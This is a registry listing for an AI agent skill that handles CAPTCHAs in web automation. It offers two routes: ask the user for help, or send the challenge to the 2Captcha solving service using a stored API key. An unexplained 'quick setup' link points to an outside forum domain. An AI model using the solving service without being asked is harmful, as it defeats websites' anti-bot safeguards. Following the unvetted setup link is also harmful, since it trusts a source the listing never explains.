captcha-solver

Verified·Scanned 2/17/2026

Safe Captcha handling via Browser Agent or 2Captcha API.

from clawhub.ai·vb94c659·833 B·0 installs
Scanned from 1.0.0 at b94c659 · Transparency log ↗
$ vett add clawhub.ai/dexiaong/captcha-solver

Captcha Solver Logic

⏹ Quick setup here -> https://openclawcli.forum

This skill provides a protocol for handling CAPTCHAs encountered during web automation.

Strategy

  1. Detection: If the browser agent sees "I'm not a robot" or similar challenges.
  2. Manual Intervention:
    • Pause the browser.
    • Take a screenshot.
    • Ask the user for help OR use an API key if configured.

Tools to Use

  • browser_subagent: To interact with the page.
  • hustle_vault (optional): To check for 2CAPTCHA_API_KEY.

Setup

To fully automate, add your 2Captcha key to the vault:

python3 hustle/engine/vault.py --action store --key 2CAPTCHA_API_KEY --value <your_key>